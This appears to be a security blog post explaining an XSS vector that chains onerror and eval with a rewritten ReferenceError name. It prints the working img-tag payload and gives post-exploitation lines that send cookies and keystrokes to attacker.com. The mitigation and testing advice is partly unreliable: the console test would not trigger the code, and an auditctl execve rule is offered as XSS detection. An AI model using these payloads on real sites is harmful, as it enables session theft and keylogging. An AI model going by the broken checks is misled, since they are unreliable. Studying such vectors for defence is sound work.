Advanced XSS Vector: Leveraging onerror and ReferenceError for Payload Execution

This vector demonstrates a sophisticated XSS technique: it combines `onerror` and `ReferenceError` manipulation to execute arbitrary JavaScript without an explicit `throw`. The payload rewrites `ReferenceError.prototype.name` so that the text of the next error message itself contains code, and the error handler (set to `eval`) then executes that message.

Payload Breakdown

<img/src/onerror=window.onerror=eval;ReferenceError.prototype.name=';alert(1);var Uncaught//';z>

1. `onerror` Handler: Assigns `eval` to `window.onerror`, so whatever error message the browser reports next is executed as code.

2. `ReferenceError` Manipulation: Overwrites `ReferenceError.prototype.name` so that the name part of every `ReferenceError` message becomes `;alert(1);var Uncaught//`. The `var Uncaught` declaration is there because browsers such as Chrome prefix the message with "Uncaught ", which would otherwise be an undefined identifier when evaluated; the `//` comments out the trailing `: z is not defined`.

3. Triggering the Error: The malformed `<img>` tag (empty `src`) fires its `onerror` handler; inside it the undefined identifier `z` raises a `ReferenceError`, whose message now carries the injected code and is passed to `window.onerror`, i.e. `eval`, executing the payload.

You Should Know:

1. Testing the Vector

  • Browser Console Verification:
    ReferenceError.prototype.name = ';console.log("XSS");//';
    throw new ReferenceError(); // Triggers the injected code
    
  • DOM-Based XSS Detection:
    grep -r "onerror.eval" /var/www/html  # Scan for vulnerable patterns
    

2. Mitigation Techniques

  • Content Security Policy (CSP):
    Content-Security-Policy: script-src 'self'; object-src 'none';
    
  • HTML Sanitization (Linux):
    sudo apt install libhtml-clean-perl
    html_clean -strip < malicious.html > sanitized.html
    

3. Advanced Exploitation (Post-Execution)

  • Cookie Exfiltration:
    fetch('https://attacker.com/steal?data=' + document.cookie);
    
  • Keylogger Injection:
    document.onkeypress = (e) => fetch('https://attacker.com/log?key=' + e.key);
    

What Undercode Say

This technique bypasses traditional XSS filters by abusing JavaScript’s error-handling mechanism. Defenders must:
– Monitor `ReferenceError` modifications:

Object.freeze(ReferenceError.prototype);

– Deploy WAF Rules:

location / {
    if ($request_uri ~ "onerror|eval\(") { return 403; }
}

– Use Linux Audit Logs:

auditctl -a always,exit -F arch=b64 -S execve -k xss_attempts

Expected Output:

  • Successful execution of `alert(1)` or custom payloads.
  • Detection via CSP violations or server logs.

Reference:

XSS Cheat Sheet (PortSwigger)

Prediction:

XSS attacks will increasingly exploit ECMAScript edge cases, requiring stricter CSP policies and runtime protection tools like WASI-based sandboxing.

Reported By: Gareth Heyes – Hackers Feeds